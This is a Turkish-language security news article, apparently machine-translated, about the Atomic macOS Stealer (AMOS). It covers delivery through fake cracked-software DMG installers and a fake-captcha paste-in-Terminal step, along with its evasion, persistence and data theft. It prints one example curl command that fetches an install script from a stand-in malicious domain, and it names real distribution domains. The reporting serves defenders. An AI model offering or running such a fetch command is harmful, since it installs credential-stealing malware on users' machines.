MacOS kullanıcıları için siber güvenlik manzarası, siber suçlular Apple’ın ekosistemini gelişmiş kötü amaçlı yazılım kampanyalarıyla giderek daha fazla hedefledikçe tehlikeli bir dönüş yaptı.
Özel bir veri hedefi kötü amaçlı yazılım olan Atomic MacOS Stealer (AMOS), Mac kullanıcıları için, özellikle de çatlak yazılım uygulamaları arayanlar için en önemli tehditlerden biri olarak ortaya çıktı.
MacOS tarihsel olarak Windows’a kıyasla daha güvenli bir işletim sistemi olarak ün yapmış olsa da, bu algı hızla değişmektedir.
Apple cihazlarının profesyoneller ve yüksek değerli hedefler arasında artan popülaritesi, platformu siber suçlular için giderek daha çekici hale getirdi.
AMOS, MAC-hedefli kötü amaçlı yazılımlarda bir paradigma değişimini temsil eder ve Apple kullanıcılarının artık yalnızca işletim sistemlerinin güvenlik konusundaki itibarına güvenemeyeceğini gösteriyor.
Trend Micro, bu tehdidi Trojan.macos.amos.pfh olarak tanımladı ve sınıflandırdı ve mevcut tehdit ortamındaki önemini vurguladı.
Kötü amaçlı yazılım, kullanıcıların lisans ücretleri ödemeden pahalı yazılıma erişme arzusunu kullanan aldatıcı dağıtım yöntemleri aracılığıyla MACOS kullanıcılarını özellikle hedefler.
AMOS kampanyası, her ikisi de MacOS güvenlik özelliklerini teknik istismarlar yerine sosyal mühendislik yoluyla atlatmak için tasarlanmış iki temel enfeksiyon vektörü kullanıyor.
Yöntem 1: Kötü niyetli DMG dosyaları
Saldırganlar, AMOS’u sahte çatlak uygulamalar aracılığıyla dağıtıyor, özellikle de CleanMyMac gibi popüler yazılımları arayan kullanıcıları hedefliyorlar.
Mağdurlar kötü amaçlı web sitelerinde “MacOS için İndir” tıkladıklarında, “Installer_V.2.13.dmg” veya “Installer_v.7.26.dmg” gibi randomize sürüm numaralarına sahip bir .dmg yükleyici dosyası alırlar. Bu dosyalar meşru yükleyiciler olarak maskelenir, ancak kötü amaçlı yükü içerir.
Bununla birlikte, Apple Gatekeeper teknolojisinin bu dağıtım yöntemine karşı etkili olduğu kanıtlanmıştır.
MacOS Sequoia’yı çalıştıran sistemlerde, bu imzasız .dmg dosyaları otomatik olarak engellenir, sistem “Apple’ın yükleyicinin kötü amaçlı yazılım içermediğini doğrulayamadığı” uyarılarını gösterir. Bu, Apple’ın yerleşik güvenlik önlemleri için önemli bir zaferi temsil ediyor.
Yöntem 2: Terminal komut enjeksiyonu
Daha başarılı dağıtım yöntemi, kullanıcılara doğrudan MacOS terminalinde kötü amaçlı komutlar yürütmelerini öğretmeyi içerir.
Tarihsel olarak, araştırdığımız etkilenen kullanıcılar Haxmac web sitesini ziyaret etti[.]CC geçen ay birkaç kez.
.
Bu teknik, Windows kötü amaçlı yazılım kampanyalarında görülen “sahte captcha” yaklaşımını yansıtır. Kullanıcılara, bir komutu kopyalamalarını ve yapıştırmalarını gerektiren bir doğrulama adımı gibi görünen şey sunulur:
textcurl -fsSL https://malicious-domain.com/install.sh
Bu yöntem son derece etkilidir, çünkü kullanıcıların kötü amaçlı kodu gönüllü olarak yürütmesini sağlayarak bekçiden atlatır. Teknik, kullanıcı güvenini ve terminal komutlarının algılanan meşruiyetinden yararlanır.
Gelişmiş Kırılma Teknikleri
AMOS operatörleri, birkaç kaçaklama stratejisi ile siber güvenlik savunmalarının sofistike bir şekilde anlaşılmasını gösterir:
Etki alanı dönüşü: Kampanya, “dtxxbz1jq070725p93.cfd” ve “Goipbp9080425d4.cfd” gibi yeniden yönetmen alanları dahil olmak üzere indirme komutları için sürekli değişen alanlar ve URL’ler kullanır. Bu teknik, statik URL tabanlı algılama sistemlerinden kaçmaya yardımcı olur ve yayından kaldırma çabalarını karmaşıklaştırır.
Çevre tespiti: Kötü amaçlı yazılım, sistem profillerinde “qemu”, “VMware” veya “KVM” gibi göstergeleri arayan sanallaştırılmış ortamları kontrol eden anti-analiz özelliklerini içerir. Sanallaştırma tespit edilirse, komut dosyası güvenlik araştırmacıları tarafından analizden kaçınmak için çıkar.
Toprağı yaşama: Amos, meşru macOS yardımcı programlarını büyük ölçüde kullanıyor osascript– curlVe AppleScript Kötü niyetli aktiviteler gerçekleştirmek için, tespiti daha zor hale getirir, çünkü bunlar normal sistem bileşenleridir.
Letrucvert’ten bir dosya yükleme.sh almak için bir curl komutu kullanıldı[.]com; Bazı durumlarda, Goatramz’dan alınır.[.]com.
![Curl komutu, Letrucvert'ten Install.sh'u indirmek için kullanıldı[.]com.](https://gbhackers.com/wp-content/uploads/2025/09/fig17-1024x447.png)
Başarılı bir şekilde kurulduktan sonra Amos, ciddi gizlilik ve güvenlik riskleri oluşturan kapsamlı veri toplama özelliklerini gösterir:
Tarayıcı verileri: Kötü amaçlı yazılım, Chrome, Firefox, Safari, Edge, Opera, Cesur ve Vivaldi gibi tüm büyük tarayıcıları hedefler, kaydedilmiş şifreleri, çerezleri ve tarama geçmişini çalır.
Kripto para birimi varlıkları: Amos, dijital varlıklara erişim sağlayabilecek cüzdan dosyalarını ve özel anahtarları çalmaya çalışan masaüstü kripto para birimi cüzdan uygulamalarını özellikle hedefler.
Sistem bilgileri: Kötü amaçlı yazılım, ayrıntılı sistem profilleri, kullanıcı adları, şifreler ve anahtarlık verileri toplar ve saldırganlara tehlikeye atılan sistem hakkında kapsamlı bilgi sağlar.
Kişisel dosyalar: Stealer, masaüstü, belgeler ve indirme klasörleri gibi ortak konumlardan belgeler (.txt, .pdf, .docx), cüzdan dosyaları ve veritabanı dosyaları dahil olmak üzere çeşitli dosya türlerini arar ve dışarı atar.
Mesajlaşma uygulamaları: Amos, özel görüşmelerden ve kişilerden ödün vererek Telegram verilerini ve diğer iletişim platformlarını hedefler.
Amos, sistem yeniden başlatıldıktan sonra bile sürekli erişimi sağlayan sofistike yöntemlerle kalıcılık oluşturur.
Kötü amaçlı yazılım, kullanıcı dizinlerinde “.Helper” ve “.agent” gibi adlarla gizli dosyalar oluşturur, ardından sistem başlatmasında otomatik yürütme sağlayan bir LaunchDaemon yapılandırma dosyası yükler.
Veri püskürtme işlemi, çalınan bilgilerin zip arşivlerine sıkıştırılmasını ve bunları HTTP Post istekleri aracılığıyla komut ve kontrol sunucularına aktarmayı içerir.
Kötü amaçlı yazılım, transferleri doğrulamak ve tehlikeye atılan sistemleri izlemek için özel başlıklar ve kodlanmış tanımlayıcılar kullanır.
Modern uç nokta tespiti ve yanıt çözümleri, davranışsal analiz yoluyla amos enfeksiyonlarının tanımlanmasında etkili olduğu kanıtlanmıştır.
Trend Vision One’ın Çalışma Tezgahı özelliği, “Web tarayıcılarından olası kimlik bilgisi erişim – macOS” ve “Şifre İstemi – MacOS” ile “Giriş Yakalama” gibi uyarılar aracılığıyla kampanyaları başarıyla tespit etti.
Bu algılama yetenekleri, ilk yürütmeden veri açığa çıkmaya kadar saldırı zinciri boyunca şüpheli faaliyetlerin ilişkilendirilmesine dayanır ve güvenlik ekiplerine uzlaşma sürecine kapsamlı bir görünürlük sağlar.
Sonuçlar ve gelecekteki eğilimler
AMOS kampanyası, MAC hedefli kötü amaçlı yazılımlarda önemli bir evrimi temsil eder ve sosyal mühendisliğin modern işletim sistemlerine karşı teknik istismarlardan daha etkili kaldığını göstermektedir.
Tehdit aktörlerinin MacOS Sequoia’nın gelişmiş korumalarını takiben .DMG tabanlı dağıtımdan terminal komutlarına hızlı uyarlaması, tehdit manzarasının dinamik doğasını göstermektedir.
Güvenlik uzmanları, potansiyel olarak meşru platformlarda kötüverizasyon kullanımı, sahte montajcıları tanıtmak için arama motoru optimizasyonu zehirlenmesi ve kara geçirme ikili işlerinin daha sofistike kötüye kullanılması dahil olmak üzere Mac kötü amaçlı yazılım taktiklerinde sürekli evrimi öngörmektedir.
Kampanya ayrıca, yalnızca yerleşik işletim sistemi korumalarına dayanmayan derinlemesine savunma stratejilerinin önemini vurgulamaktadır.
Apple’ın bekçisi geleneksel yükleyici tabanlı saldırıları başarıyla engellerken, terminal komut yöntemi bu korumaları atlamada oldukça etkili oldu.
Bu hikayeyi ilginç bul! Daha fazla güncelleme almak için bizi LinkedIn ve X’te takip edin.